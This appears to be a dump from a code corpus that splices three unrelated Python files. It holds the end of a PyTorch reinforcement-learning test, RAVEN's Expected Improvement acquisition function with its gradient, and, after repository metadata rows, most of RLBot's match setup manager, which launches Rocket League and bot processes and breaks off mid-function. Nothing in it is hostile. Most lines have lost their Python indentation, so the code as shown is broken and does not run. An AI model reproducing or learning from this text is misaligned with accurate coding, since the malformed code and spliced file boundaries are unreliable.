ratio = torch.mean(best_test_reward) / best_test_possible_reward
return ratio < expect_reward_threshold, ratio
evaluate()
training_data = DataLoader(train_batches, collate_fn=lambda x: x[0])
pl_trainer = pl.Trainer(
max_epochs=epochs,
gpus=None if device == torch.device("cpu") else 1,
logger=False,
)
pl_trainer.fit(trainer, training_data)
result, ratio = evaluate()
    assert result, (
        f"Test failed: reward ratio {ratio} did not drop below the "
        f"expected threshold {expect_reward_threshold}."
    )
# ==== idaholab/raven :: /ravenframework/Optimizers/acquisitionFunctions/ExpectedImprovement.py (Apache-2.0) ====
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Class for implementing Expected Improvement
auth: Anthoney Griffith (@grifaa)
date: June, 2023
"""
# External Modules
from scipy.stats import norm
import numpy as np
# External Modules End
# Internal Modules
import abc
from ...utils import utils, InputData, InputTypes
from .AcquisitionFunction import AcquisitionFunction
# Internal Modules End
class ExpectedImprovement(AcquisitionFunction):
"""
Provides class for the Expected Improvement (EI) acquisition function
"""
##########################
# Initialization Methods #
##########################
@classmethod
def getInputSpecification(cls):
"""
Method to get a reference to a class that specifies the input data for class cls.
@ In, None
@ Out, specs, InputData.ParameterInput, class to use for specifying input of cls.
"""
specs = super(ExpectedImprovement, cls).getInputSpecification()
specs.description = r"""If this node is present within the acquisition node,
    the expected improvement acquisition function is utilized.
This function is derived by applying Bayesian optimal decision making (Bellman's Principle of Optimality)
with a local reward utility function in conjunction with a one-step lookahead.
The approach weighs both expected reward and likely reward with the
following expression (for minimization):
    $EI(x) = (f^*-\mu)\Phi(\frac{f^*-\mu}{s}) + s \phi(\frac{f^*-\mu}{s})$"""
return specs
######################
# Evaluation Methods #
######################
def evaluate(self, var, bayesianOptimizer, vectorized=False):
"""
Evaluates acquisition function using the current BO instance
Should be overwritten by specific acquisition functions
@ In, var, np.array, input to evaluate Expected Improvement at
@ In, bayesianOptimizer, instance of the BayesianOptimizer cls, provides access to model and evaluation method
@ In, vectorized, bool, whether the evaluation should be vectorized or not (useful for differential evolution)
@ Out, EI, float, expected improvement function value
"""
# Need to retrieve current optimum point
best = bayesianOptimizer._optPointHistory[0][-1][0]
fopt = best[bayesianOptimizer._objectiveVar]
# Need to convert array input "x" into dict point
featurePoint = bayesianOptimizer.arrayToFeaturePoint(var)
# Evaluate posterior mean and standard deviation
mu, s = bayesianOptimizer._evaluateRegressionModel(featurePoint)
# Is this evaluation vectorized?
if vectorized:
      betaVec = np.divide(np.add(-mu, fopt), s)
pdfVec = norm.pdf(betaVec)
cdfVec = norm.cdf(betaVec)
term1 = np.multiply(np.add(-mu, fopt), cdfVec)
term2 = np.multiply(s, pdfVec)
EI = np.add(term1, term2)
else:
# Breaking out components from closed-form of EI (GPR)
# Definition of standard gaussian density function
beta = (fopt - mu) / s
pdf = norm.pdf(beta)
# Standard normal cdf from scipy.stats
cdf = norm.cdf(beta)
# Definition of EI
EI = ((fopt - mu) * cdf) + (s * pdf)
return EI
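    # Standalone numeric sanity check of the closed form above (illustrative
    # values only): with fopt = 1.0, mu = 0.5, s = 0.25 we get beta = 2.0 and
    # EI = 0.5 * norm.cdf(2.0) + 0.25 * norm.pdf(2.0) ~= 0.502.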
def gradient(self, var, bayesianOptimizer):
"""
Evaluates acquisition function's gradient using the current BO instance/ROM
Should be overwritten by specific acquisition functions
@ In, var, np.array, input to evaluate Expected Improvement gradient at
@ In, bayesianOptimizer, instance of the BayesianOptimizer cls, provides access to model and evaluation method
@ Out, EIGrad, float/array, EI gradient value
"""
# NOTE assumes scikitlearn GPR currently
# Need to convert array input "x" into dict point
featurePoint = bayesianOptimizer.arrayToFeaturePoint(var)
# Evaluate posterior mean and standard deviation
mu, s = bayesianOptimizer._evaluateRegressionModel(featurePoint)
meanGrad, stdGrad = bayesianOptimizer._model.supervisedContainer[0].evaluateGradients(var)
# Need to retrieve current optimum point
best = bayesianOptimizer._optPointHistory[0][-1][0]
fopt = best[bayesianOptimizer._objectiveVar]
# Other common quantities
beta = (fopt - mu)/s
phi = norm.pdf(beta)
Phi = norm.cdf(beta)
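    # Chain rule on EI = (f*-mu)*Phi(beta) + s*phi(beta) with beta = (f*-mu)/s:
    #   dEI/dx = stdGrad*phi - meanGrad^T*Phi + betaGrad*((f*-mu)*phi + s*phi'),
    # which is exactly the expression assembled below.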
betaGrad = np.subtract(-s * np.transpose(meanGrad), (fopt - mu) * stdGrad) / (s**2)
# Derivative of standard normal pdf
phiGrad = (-beta / (np.sqrt(2 * np.pi))) * np.exp(-(beta**2) / 2)
EIGrad = stdGrad * phi - np.transpose(meanGrad) * Phi + betaGrad * (phi * (fopt - mu) + s * phiGrad)
return EIGrad
|
f64645241f91ba3803b8cdbefe297e9290e24047
|
59886a1143cc4043b19e398fae1fddb5742b4b55
|
/src/main/python/rlbot/setup_manager.py
|
b107541f877a62e8f8b7adf88e2ae250ef0a5ef4
|
[
"MIT"
] |
permissive
|
RLBot/RLBot
|
a6c4f502403f02822b3e4078b27583226584432e
|
c2f7c9a07911691b112b5338008e2ec932e7aee0
|
refs/heads/master
| 2023-08-16T06:04:35.384448
| 2023-07-01T11:21:26
| 2023-07-01T11:21:26
| 80,671,678
| 482
| 138
|
MIT
| 2023-07-01T11:21:28
| 2017-02-01T22:36:52
|
Python
|
UTF-8
|
Python
| false
| false
| 40,063
|
py
|
setup_manager.py
|
import signal
import multiprocessing as mp
import os
import sys
import json
from dataclasses import dataclass
import psutil
import platform
import queue
import subprocess
import time
import webbrowser
from contextlib import contextmanager
from datetime import datetime, timedelta
from pathlib import Path
from typing import List, Optional, Dict, Set
from urllib.parse import ParseResult as URL
from urllib.request import urlopen
from urllib.error import URLError
from dataclasses import dataclass
from rlbot.gamelaunch.epic_launch import launch_with_epic_login_trick, launch_with_epic_simple
from rlbot.socket.socket_data_reporter import get_one_packet
from rlbot.utils.structures import game_data_struct
from rlbot import gateway_util
from rlbot import version
from rlbot.base_extension import BaseExtension
from rlbot.botmanager.bot_manager_independent import BotManagerIndependent
from rlbot.botmanager.bot_manager_struct import BotManagerStruct
from rlbot.botmanager.helper_process_manager import HelperProcessManager
from rlbot.botmanager.agent_metadata import AgentMetadata
from rlbot.gateway_util import LaunchOptions, NetworkingRole
from rlbot.matchconfig.conversions import parse_match_config
from rlbot.matchconfig.match_config import MatchConfig, PlayerConfig
from rlbot.matchconfig.psyonix_config import set_random_psyonix_bot_preset
from rlbot.matchcomms.server import launch_matchcomms_server
from rlbot.parsing.bot_config_bundle import get_bot_config_bundle, BotConfigBundle, get_script_config_bundle
from rlbot.parsing.custom_config import ConfigObject
from rlbot.parsing.rlbot_config_parser import create_bot_config_layout
from rlbot.utils import process_configuration
from rlbot.utils.class_importer import import_class_with_base, import_agent
from rlbot.utils.logging_utils import get_logger, DEFAULT_LOGGER
from rlbot.utils.process_configuration import WrongProcessArgs
from rlbot.utils.structures.start_match_structures import MAX_PLAYERS
from rlbot.utils.structures.game_interface import GameInterface, USE_OLD_LAUNCH
from rlbot.utils.config_parser import mergeTASystemSettings, cleanUpTASystemSettings
from rlbot.parsing.rlbot_config_parser import LAUNCHER_PREFERENCE_KEY
from rlbot.matchcomms.server import MatchcommsServerThread
from rlbot.utils.virtual_environment_management import EnvBuilderWithRequirements
if platform.system() == 'Windows':
import msvcrt
# By default, look for rlbot.cfg in the current working directory.
DEFAULT_RLBOT_CONFIG_LOCATION = os.path.realpath('./rlbot.cfg')
RLBOT_CONFIGURATION_HEADER = 'RLBot Configuration'
class ROCKET_LEAGUE_PROCESS_INFO:
GAMEID = 252950
PROGRAM_NAME = 'RocketLeague.exe' if platform.system() == 'Windows' else 'RocketLeague'
PROGRAM = 'RocketLeague.exe' if platform.system() == 'Windows' else 'RocketLeague'
REQUIRED_ARGS = {r'-rlbot', r'RLBot_ControllerURL=127.0.0.1:[0-9]+'}
@staticmethod
def get_ideal_args(port):
# We are specifying RLBot_PacketSendRate=240, which will override people's TARLBot.ini settings.
# We believe there is no downside to 240. See https://github.com/RLBot/RLBot/wiki/Tick-Rate
return ['-rlbot', f'RLBot_ControllerURL=127.0.0.1:{port}', 'RLBot_PacketSendRate=240', '-nomovie']
@dataclass
class RocketLeagueLauncherPreference:
STEAM = 'steam'
EPIC = 'epic' # This tries epic first, then falls back to steam. Weird name is for backwards compat.
EPIC_ONLY = 'epic_only'
preferred_launcher: str
use_login_tricks: bool
rocket_league_exe_path: Optional[Path] = None
# By default, we will attempt Epic with login tricks, then fall back to Steam.
DEFAULT_LAUNCHER_PREFERENCE = RocketLeagueLauncherPreference(RocketLeagueLauncherPreference.EPIC, True)
@contextmanager
def setup_manager_context(launcher_preference: RocketLeagueLauncherPreference = None):
"""
    Creates an initialized context manager which shuts down at the end of the
`with` block.
usage:
>>> with setup_manager_context() as setup_manager:
... setup_manager.load_config(...)
... # ... Run match
"""
setup_manager = SetupManager()
setup_manager.connect_to_game(launcher_preference)
try:
yield setup_manager
except Exception as e:
get_logger(DEFAULT_LOGGER).error(e)
raise e
finally:
setup_manager.shut_down(kill_all_pids=True)
@dataclass
class BotProcessInfo:
process: mp.Process
subprocess: subprocess.Popen
player_config: PlayerConfig
def is_alive(self):
if self.process is not None:
return self.process.is_alive()
return self.subprocess.poll() is None
class SetupManager:
"""
This class is responsible for pulling together all bits of the framework to
set up a match between agents.
A normal order of methods would be:
connect_to_game()
load_config()
launch_ball_prediction()
launch_bot_processes()
start_match()
infinite_loop()
# the below two might be from another thread
reload_all_agents()
shut_down()
"""
has_started = False
num_participants = None
names = None
teams = None
python_files = None
bot_bundles: List[BotConfigBundle] = None
match_config: MatchConfig = None
extension = None
def __init__(self):
self.logger = get_logger(DEFAULT_LOGGER)
self.game_interface = GameInterface(self.logger)
self.quit_event = mp.Event()
self.helper_process_manager = HelperProcessManager(self.quit_event)
self.bot_quit_callbacks = []
self.bot_reload_requests = []
self.agent_metadata_map: Dict[int, AgentMetadata] = {}
self.match_config: MatchConfig = None
self.launcher_preference = None
self.rlbot_gateway_process = None
self.matchcomms_server: MatchcommsServerThread = None
self.early_start_seconds = 0
self.num_metadata_received = 0
self.agent_metadata_queue = mp.Queue()
self.bot_processes: Dict[int, BotProcessInfo] = {}
self.script_processes: Dict[int, subprocess.Popen] = {}
def is_rocket_league_running(self, port) -> bool:
"""
Returns whether Rocket League is running with the right port.
"""
try:
is_rocket_league_running, proc = process_configuration.is_process_running(
ROCKET_LEAGUE_PROCESS_INFO.PROGRAM,
ROCKET_LEAGUE_PROCESS_INFO.PROGRAM_NAME,
ROCKET_LEAGUE_PROCESS_INFO.REQUIRED_ARGS)
if proc is not None:
# Check for correct port.
rocket_league_port = self._read_port_from_rocket_league_args(proc.cmdline())
if rocket_league_port is not None and rocket_league_port != port:
raise Exception(f"Rocket League is already running with port {rocket_league_port} but we wanted "
f"{port}! Please close Rocket League and let us start it for you instead!")
except WrongProcessArgs:
raise Exception(f"Rocket League is not running with {ROCKET_LEAGUE_PROCESS_INFO.REQUIRED_ARGS}!\n"
"Please close Rocket League and let us start it for you instead!")
return is_rocket_league_running
def connect_to_game(self, launcher_preference: RocketLeagueLauncherPreference = None):
"""
Connects to the game by initializing self.game_interface.
"""
version.print_current_release_notes()
port = self.ensure_rlbot_gateway_started()
# Prevent loading game interface twice.
if self.has_started:
if not self.is_rocket_league_running(port):
raise Exception("Rocket League is not running even though we started it once.\n"
"Please restart RLBot.")
return
# Currently match_config is None when launching from RLBotGUI.
if self.match_config is not None and self.match_config.networking_role == 'remote_rlbot_client':
self.logger.info("Will not start Rocket League because this is configured as a client!")
# Launch the game if it is not running.
elif not self.is_rocket_league_running(port):
mergeTASystemSettings()
pref = launcher_preference or self.launcher_preference or DEFAULT_LAUNCHER_PREFERENCE
if not self.launch_rocket_league(port=port, launcher_preference=pref):
raise Exception("Failed to launch Rocket League!")
try:
self.logger.info("Loading interface...")
# We're not going to use this game_interface for much, just sending start match messages and inspecting
# the packet to see if the appropriate cars have been spawned.
self.game_interface.load_interface(
port=23234, wants_ball_predictions=False, wants_quick_chat=False, wants_game_messages=False)
except Exception as e:
self.logger.error("Terminating rlbot gateway and raising:")
self.rlbot_gateway_process.terminate()
raise e
self.has_started = True
@staticmethod
def _read_port_from_rocket_league_args(args):
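        # Example (hypothetical args list):
        #   _read_port_from_rocket_league_args(
        #       ['RLBot_ControllerURL="127.0.0.1:23233"']) -> 23233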
for arg in args:
# The arg will look like RLBot_ControllerURL="127.0.0.1:23233"
if 'RLBot_ControllerURL' in arg:
rocket_league_port = int(arg.split(':')[1].replace('"', ''))
return int(rocket_league_port)
return None
def launch_rocket_league(self, port, launcher_preference: RocketLeagueLauncherPreference = DEFAULT_LAUNCHER_PREFERENCE) -> bool:
if launcher_preference.preferred_launcher == RocketLeagueLauncherPreference.EPIC_ONLY:
return self.launch_rocket_league_with_epic(port, launcher_preference)
elif launcher_preference.preferred_launcher == RocketLeagueLauncherPreference.STEAM:
return self.launch_rocket_league_with_steam(port)
elif launcher_preference.preferred_launcher == RocketLeagueLauncherPreference.EPIC:
# Historically, the preference of EPIC has caused RLBot to try Epic first, then Steam.
# Keeping that behavior for backwards compatibility.
epic_worked = self.launch_rocket_league_with_epic(port, launcher_preference)
if epic_worked:
return True
self.logger.info("Epic launch has failed, falling back to Steam!")
return self.launch_rocket_league_with_steam(port)
def launch_rocket_league_with_epic(self, port, launcher_preference: RocketLeagueLauncherPreference) -> bool:
"""
Launches Rocket League but does not connect to it.
"""
ideal_args = ROCKET_LEAGUE_PROCESS_INFO.get_ideal_args(port)
if launcher_preference.use_login_tricks:
if launch_with_epic_login_trick(ideal_args, launcher_preference):
return True
else:
self.logger.info("Epic login trick seems to have failed!")
        if launch_with_epic_simple(ideal_args, launcher_preference):
            return True
        return False
def launch_rocket_league_with_steam(self, port) -> bool:
# Try launch via Steam.
ideal_args = ROCKET_LEAGUE_PROCESS_INFO.get_ideal_args(port)
steam_exe_path = try_get_steam_executable_path()
if steam_exe_path: # Note: This Python 3.8 feature would be useful here https://www.python.org/dev/peps/pep-0572/#abstract
exe_and_args = [
str(steam_exe_path),
'-applaunch',
str(ROCKET_LEAGUE_PROCESS_INFO.GAMEID),
] + ideal_args
self.logger.info(f'Launching Rocket League with: {exe_and_args}')
_ = subprocess.Popen(exe_and_args) # This is deliberately an orphan process.
return True
self.logger.warning(f'Launching Rocket League using Steam-only fall-back launch method with args: {ideal_args}')
self.logger.info("You should see a confirmation pop-up, if you don't see it then click on Steam! "
'https://gfycat.com/AngryQuickFinnishspitz')
args_string = '%20'.join(ideal_args)
# Try launch via terminal (Linux)
if platform.system() == 'Linux':
linux_args = [
'steam',
f'steam://rungameid/{ROCKET_LEAGUE_PROCESS_INFO.GAMEID}//{args_string}'
]
try:
_ = subprocess.Popen(linux_args)
return True
except OSError:
self.logger.warning('Could not launch Steam executable on Linux.')
try:
self.logger.info("Launching rocket league via steam browser URL as a last resort...")
webbrowser.open(f'steam://rungameid/{ROCKET_LEAGUE_PROCESS_INFO.GAMEID}//{args_string}')
except webbrowser.Error:
self.logger.warning(
'Unable to launch Rocket League. Please launch Rocket League manually using the -rlbot option to continue.')
return False
return True
def load_match_config(self, match_config: MatchConfig, bot_config_overrides={}):
"""
Loads the match config into internal data structures, which prepares us to later
launch bot processes and start the match.
This is an alternative to the load_config method; they accomplish the same thing.
"""
self.num_participants = match_config.num_players
self.names = [bot.name for bot in match_config.player_configs]
self.teams = [bot.team for bot in match_config.player_configs]
for player in match_config.player_configs:
if player.bot and not player.rlbot_controlled and not player.loadout_config:
set_random_psyonix_bot_preset(player)
bundles = [bot_config_overrides[index] if index in bot_config_overrides else
get_bot_config_bundle(bot.config_path) if bot.config_path else None
for index, bot in enumerate(match_config.player_configs)]
self.python_files = [bundle.python_file if bundle else None
for bundle in bundles]
self.bot_bundles = []
for index, bot in enumerate(match_config.player_configs):
self.bot_bundles.append(bundles[index])
if bot.loadout_config is None and bundles[index]:
bot.loadout_config = bundles[index].generate_loadout_config(index, bot.team)
if match_config.extension_config is not None and match_config.extension_config.python_file_path is not None:
self.load_extension(match_config.extension_config.python_file_path)
try:
urlopen("http://google.com")
checked_environment_requirements = set()
online = True
except URLError:
self.logger.warn("The user is offline, skipping upgrade the bot requirements")
online = False
for bundle in self.bot_bundles:
if bundle is not None and bundle.use_virtual_environment:
do_post_setup = online
if do_post_setup:
if bundle.requirements_file in checked_environment_requirements:
do_post_setup = False
else:
checked_environment_requirements.add(bundle.requirements_file)
builder = EnvBuilderWithRequirements(bundle=bundle, do_post_setup=do_post_setup)
path = Path(bundle.config_directory) / 'venv'
if not path.exists():
builder.create(path)
else:
env_dir = os.path.abspath(path)
context = builder.ensure_directories(env_dir)
if not builder.upgrade:
builder.post_setup(context)
for script_config in match_config.script_configs:
script_config_bundle = get_script_config_bundle(script_config.config_path)
if script_config_bundle.use_virtual_environment:
do_post_setup = online
if do_post_setup:
                    if script_config_bundle.requirements_file in checked_environment_requirements:
                        do_post_setup = False
                    else:
                        checked_environment_requirements.add(script_config_bundle.requirements_file)
builder = EnvBuilderWithRequirements(bundle=script_config_bundle, do_post_setup=do_post_setup)
path = Path(script_config_bundle.config_directory) / 'venv'
if not path.exists():
builder.create(path)
else:
env_dir = os.path.abspath(path)
context = builder.ensure_directories(env_dir)
if not builder.upgrade:
builder.post_setup(context)
self.match_config = match_config
self.game_interface.match_config = match_config
self.game_interface.start_match_flatbuffer = match_config.create_flatbuffer()
if USE_OLD_LAUNCH:
self.start_match_configuration = match_config.create_match_settings()
self.game_interface.start_match_configuration = self.start_match_configuration
def load_config(self, framework_config: ConfigObject = None, config_location=DEFAULT_RLBOT_CONFIG_LOCATION,
bot_configs=None,
looks_configs=None):
"""
Loads the configuration into internal data structures, which prepares us to later
launch bot processes and start the match.
:param framework_config: A config object that indicates what bots to run. May come from parsing a rlbot.cfg.
:param config_location: The location of the rlbot.cfg file, which will be used to resolve relative paths.
:param bot_configs: Overrides for bot configurations.
:param looks_configs: Overrides for looks configurations.
"""
self.logger.debug('reading the configs')
# Set up RLBot.cfg
if framework_config is None:
framework_config = create_bot_config_layout()
framework_config.parse_file(config_location, max_index=MAX_PLAYERS)
if bot_configs is None:
bot_configs = {}
if looks_configs is None:
looks_configs = {}
match_config = parse_match_config(framework_config, config_location, bot_configs, looks_configs)
self.load_match_config(match_config, bot_configs)
raw_launcher_string = framework_config.get(RLBOT_CONFIGURATION_HEADER, LAUNCHER_PREFERENCE_KEY)
if raw_launcher_string == RocketLeagueLauncherPreference.STEAM:
self.launcher_preference = RocketLeagueLauncherPreference(RocketLeagueLauncherPreference.STEAM, False)
else:
self.launcher_preference = DEFAULT_LAUNCHER_PREFERENCE
def ensure_rlbot_gateway_started(self) -> int:
"""
Ensures that RLBot.exe is running. Returns the port that it will be listening on for connections from
Rocket League. Rocket League should be passed a command line argument so that it starts with this same port.
:return:
"""
# TODO: Uncomment this when done with local testing of Remote RLBot.
self.rlbot_gateway_process, port = gateway_util.find_existing_process()
if self.rlbot_gateway_process is not None:
self.logger.info(f"Already have RLBot.exe running! Port is {port}")
return port
launch_options = LaunchOptions()
if self.match_config is not None: # Currently this is None when launching from RLBotGUI.
networking_role = NetworkingRole[self.match_config.networking_role]
launch_options = LaunchOptions(
networking_role=networking_role,
remote_address=self.match_config.network_address)
self.rlbot_gateway_process, port = gateway_util.launch(launch_options)
self.logger.info(f"Python started RLBot.exe with process id {self.rlbot_gateway_process.pid} "
f"and port {port}")
return port
def launch_ball_prediction(self):
# This does nothing now. It's kept here temporarily so that RLBotGUI doesn't break.
pass
def has_received_metadata_from_all_bots(self):
expected_metadata_calls = sum(1 for player in self.match_config.player_configs if player.rlbot_controlled)
return self.num_metadata_received >= expected_metadata_calls
def launch_early_start_bot_processes(self, match_config: MatchConfig = None):
"""
Some bots can start up before the game is ready and not be bothered by missing
or strange looking values in the game tick packet, etc. Such bots can opt in to the
early start category and enjoy extra time to load up before the match starts.
WARNING: Early start is a bad idea if there's any risk that bots will not get their promised
index. This can happen with remote RLBot, etc.
"""
if self.match_config.networking_role == NetworkingRole.remote_rlbot_client:
return # The bot indices are liable to change, so don't start anything yet.
self.logger.debug("Launching early-start bot processes")
num_started = self.launch_bot_process_helper(early_starters_only=True, match_config=match_config or self.match_config)
self.try_recieve_agent_metadata()
if num_started > 0 and self.early_start_seconds > 0:
self.logger.info(f"Waiting for {self.early_start_seconds} seconds to let early-start bots load.")
end_time = datetime.now() + timedelta(seconds=self.early_start_seconds)
while datetime.now() < end_time:
self.try_recieve_agent_metadata()
time.sleep(0.1)
def launch_bot_processes(self, match_config: MatchConfig = None):
self.logger.debug("Launching bot processes")
self.launch_bot_process_helper(early_starters_only=False, match_config=match_config or self.match_config)
def launch_bot_process_helper(self, early_starters_only=False, match_config: MatchConfig = None):
# Start matchcomms here as it's only required for the bots.
if not self.matchcomms_server:
self.matchcomms_server = launch_matchcomms_server()
self.bot_processes = {ind: proc for ind, proc in self.bot_processes.items() if proc.is_alive()}
num_started = 0
# Launch processes
# TODO: this might be the right moment to fix the player indices based on a game tick packet.
if not early_starters_only:
if USE_OLD_LAUNCH:
packet = game_data_struct.GameTickPacket()
self.game_interface.update_live_data_packet(packet)
else:
packet = get_one_packet()
# TODO: root through the packet and find discrepancies in the player index mapping.
for i in range(min(self.num_participants, len(match_config.player_configs))):
player_config = match_config.player_configs[i]
if not player_config.has_bot_script():
continue
if early_starters_only and not self.bot_bundles[i].supports_early_start:
continue
spawn_id = player_config.spawn_id
if early_starters_only:
# Danger: we have low confidence in this since we're not leveraging the spawn id.
participant_index = i
else:
participant_index = None
self.logger.info(f'Player in slot {i} was sent with spawn id {spawn_id}, will search in the packet.')
num_players = packet.num_cars if USE_OLD_LAUNCH else packet.PlayersLength()
for n in range(0, num_players):
packet_spawn_id = packet.game_cars[n].spawn_id if USE_OLD_LAUNCH else packet.Players(n).SpawnId()
if spawn_id == packet_spawn_id:
self.logger.info(f'Looks good, considering participant index to be {n}')
participant_index = n
if participant_index is None:
for prox_index, proc_info in self.bot_processes.items():
if spawn_id == proc_info.player_config.spawn_id:
participant_index = prox_index
if participant_index is None:
raise Exception(f"Unable to determine the bot index for spawn id {spawn_id}")
if participant_index not in self.bot_processes:
bundle = get_bot_config_bundle(player_config.config_path)
deduped_name = str(self.match_config.player_configs[i].deduped_name)
if bundle.supports_standalone:
executable = sys.executable
if bundle.use_virtual_environment:
if platform.system() == "Windows":
executable = str(Path(bundle.config_directory) / 'venv' / 'Scripts' / 'python.exe')
else:
executable = str(Path(bundle.config_directory) / 'venv' / 'bin' / 'python')
process = subprocess.Popen([
executable,
bundle.python_file,
'--config-file', str(player_config.config_path),
'--name', deduped_name,
'--team', str(self.teams[i]),
'--player-index', str(participant_index),
'--spawn-id', str(spawn_id),
'--matchcomms-url', self.matchcomms_server.root_url.geturl()
], cwd=Path(bundle.config_directory).parent, stdin=subprocess.PIPE)
self.bot_processes[participant_index] = BotProcessInfo(process=None, subprocess=process, player_config=player_config)
# Insert immediately into the agent metadata map because the standalone process has no way to communicate it back out
self.agent_metadata_map[participant_index] = AgentMetadata(participant_index, deduped_name, self.teams[i], {process.pid})
self.num_metadata_received += 1
else:
reload_request = mp.Event()
quit_callback = mp.Event()
self.bot_reload_requests.append(reload_request)
self.bot_quit_callbacks.append(quit_callback)
process = mp.Process(target=SetupManager.run_agent,
args=(self.quit_event, quit_callback, reload_request, self.bot_bundles[i],
deduped_name,
self.teams[i], participant_index, self.python_files[i], self.agent_metadata_queue,
match_config, self.matchcomms_server.root_url, spawn_id))
process.start()
self.bot_processes[participant_index] = BotProcessInfo(process=process, subprocess=None, player_config=player_config)
num_started += 1
self.logger.info(f"Successfully started {num_started} bot processes")
process_configuration.configure_processes(self.agent_metadata_map, self.logger)
scripts_started = 0
for script_config in match_config.script_configs:
script_config_bundle = get_script_config_bundle(script_config.config_path)
if early_starters_only and not script_config_bundle.supports_early_start:
continue
executable = sys.executable
if script_config_bundle.use_virtual_environment:
if platform.system() == "Windows":
executable = str(Path(script_config_bundle.config_directory) / 'venv' / 'Scripts' / 'python.exe')
else:
executable = str(Path(script_config_bundle.config_directory) / 'venv' / 'bin' / 'python')
process = subprocess.Popen(
[
executable,
script_config_bundle.script_file,
'--matchcomms-url', self.matchcomms_server.root_url.geturl()
],
cwd=Path(script_config_bundle.config_directory).parent,
stdin=subprocess.PIPE
)
self.logger.info(f"Started script with pid {process.pid} using {process.args}")
self.script_processes[process.pid] = process
scripts_started += 1
self.logger.debug(f"Successfully started {scripts_started} scripts")
return num_started
def launch_quick_chat_manager(self):
# Quick chat manager is gone since we're using RLBot.exe now.
# Keeping this function around for backwards compatibility.
pass
def start_match(self):
if self.match_config.networking_role == NetworkingRole.remote_rlbot_client:
match_settings = self.game_interface.get_match_settings()
# TODO: merge the match settings into self.match_config
# And then make sure we still only start the appropriate bot processes
# that we originally asked for.
self.logger.info("Python attempting to start match.")
self.game_interface.start_match()
self.game_interface.wait_until_valid_packet()
self.logger.info("Match has started")
cleanUpTASystemSettings()
def infinite_loop(self):
instructions = "Press 'r' to reload all agents, or 'q' to exit"
self.logger.info(instructions)
while not self.quit_event.is_set():
# Handle commands
# TODO windows only library
if platform.system() == 'Windows':
if msvcrt.kbhit():
command = msvcrt.getwch()
if command.lower() == 'r': # r: reload
self.reload_all_agents()
elif command.lower() == 'q' or command == '\u001b': # q or ESC: quit
self.shut_down()
break
                    # Print instructions again if an alphabetic character was pressed but no command was found
elif command.isalpha():
self.logger.info(instructions)
else:
try:
# https://python-forum.io/Thread-msvcrt-getkey-for-linux
import termios, sys
TERMIOS = termios
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
new = termios.tcgetattr(fd)
new[3] = new[3] & ~TERMIOS.ICANON & ~TERMIOS.ECHO
new[6][TERMIOS.VMIN] = 1
new[6][TERMIOS.VTIME] = 0
termios.tcsetattr(fd, TERMIOS.TCSANOW, new)
command = None
try:
command = os.read(fd, 1)
finally:
termios.tcsetattr(fd, TERMIOS.TCSAFLUSH, old)
command = command.decode("utf-8")
if command.lower() == 'r': # r: reload
self.reload_all_agents()
elif command.lower() == 'q' or command == '\u001b': # q or ESC: quit
self.shut_down()
break
                    # Print instructions again if an alphabetic character was pressed but no command was found
elif command.isalpha():
self.logger.info(instructions)
                except Exception:
                    pass
self.try_recieve_agent_metadata()
def try_recieve_agent_metadata(self):
"""
Checks whether any of the started bots have posted their AgentMetadata
yet. If so, we put them on the agent_metadata_map such that we can
        kill their processes later when we shut_down(kill_all_pids=True).
        Returns how many bots we received metadata from.
"""
num_recieved = 0
while True: # will exit on queue.Empty
try:
single_agent_metadata: AgentMetadata = self.agent_metadata_queue.get(timeout=0.1)
num_recieved += 1
if single_agent_metadata.name not in [pc.deduped_name for pc in self.match_config.player_configs]:
self.logger.warn(f"Got agent metadata for {single_agent_metadata.name} but it shouldn't be running!")
self.helper_process_manager.start_or_update_helper_process(single_agent_metadata)
self.agent_metadata_map[single_agent_metadata.index] = single_agent_metadata
process_configuration.configure_processes(self.agent_metadata_map, self.logger)
except queue.Empty:
self.num_metadata_received += num_recieved
break
# Let's go through the agent metadata map and see if we can expand it with any child processes.
        # We'll do it every time this function is called (generally periodically),
        # since we don't know when an agent might spawn another process.
if process_configuration.append_child_pids(self.agent_metadata_map):
process_configuration.configure_processes(self.agent_metadata_map, self.logger)
return num_recieved
def reload_all_agents(self, quiet=False):
if not quiet:
self.logger.info("Reloading all agents...")
for rr in self.bot_reload_requests:
rr.set()
def shut_down(self, time_limit=5, kill_all_pids=False, quiet=False):
if not quiet:
self.logger.info("Shutting Down")
self.quit_event.set()
end_time = datetime.now() + timedelta(seconds=time_limit)
# Don't kill RLBot.exe. It needs to keep running because if we're in a GUI
# that will persist after this shut down, the interface dll in charge of starting
# matches is already locked in to its shared memory files, and if we start a new
# RLBot.exe, those files will go stale. https://github.com/skyborgff/RLBot/issues/9
# Wait for all processes to terminate before terminating main process
terminated = False
while not terminated:
terminated = True
for callback in self.bot_quit_callbacks:
if not callback.is_set():
terminated = False
time.sleep(0.1)
if datetime.now() > end_time:
self.logger.info("Taking too long to quit, trying harder...")
break
self.kill_bot_processes()
self.kill_agent_process_ids(set(self.script_processes.keys()))
if kill_all_pids:
# The original meaning of the kill_all_pids flag only applied to bots, not scripts,
# so we are doing that separately.
self.kill_agent_process_ids(process_configuration.extract_all_pids(self.agent_metadata_map))
self.kill_matchcomms_server()
# Drain the agent_metadata_queue to make sure nothing rears its head later.
while True: # will exit on queue.Empty
try:
metadata = self.agent_metadata_queue.get(timeout=0.1)
self.logger.warn(f"Drained out metadata for {metadata.name} during shutdown!")
except queue.Empty:
break
# The quit event can only be set once. Let's reset to our initial state
self.quit_event = mp.Event()
self.helper_process_manager = HelperProcessManager(self.quit_event)
if not quiet:
self.logger.info("Shut down complete!")
def load_extension(self, extension_filename):
try:
extension_class = import_class_with_base(extension_filename, BaseExtension).get_loaded_class()
self.extension = extension_class(self)
self.game_interface.set_extension(self.extension)
except FileNotFoundError as e:
print(f'Failed to load extension: {e}')
@staticmethod
def run_agent(terminate_event, callback_event, reload_request, bundle: BotConfigBundle, name, team, index,
python_file, agent_telemetry_queue, match_config: MatchConfig, matchcomms_root: URL, spawn_id: str):
# Set the working directory to one level above the bot cfg file.
# This mimics the behavior you get when executing run.py in one of the
# example bot repositories, so bots will be more likely to 'just work'
# even if the developer is careless about file paths.
